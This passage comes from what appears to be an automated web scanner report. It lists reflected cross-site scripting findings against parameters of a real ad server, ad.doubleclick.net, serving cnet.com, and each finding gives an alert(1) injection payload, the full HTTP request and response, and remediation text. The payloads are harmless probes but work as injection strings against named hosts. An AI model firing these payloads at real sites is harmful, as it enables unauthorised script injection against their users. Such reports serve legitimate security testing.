41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.147. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"-alert(1)-"b2ea1892855 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54536

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.148. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3537'-alert(1)-'9e6d81f8f7a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/htt
...[SNIP]...

3.149. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f493"-alert(1)-"02b8d42dafa was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.150. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a9a7"-alert(1)-"ad0b1b525e8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.151. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df1a'-alert(1)-'d8d0b082069 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.152. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b300"-alert(1)-"46531bd7138 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.153. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfcb1'-alert(1)-'a9d20cd76d8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.154. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c9c'-alert(1)-'3c148c4423f was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.155. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0530"-alert(1)-"a006e1efd34 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;

...[SNIP]...

3.156. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e91'-alert(1)-'f91892f526a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
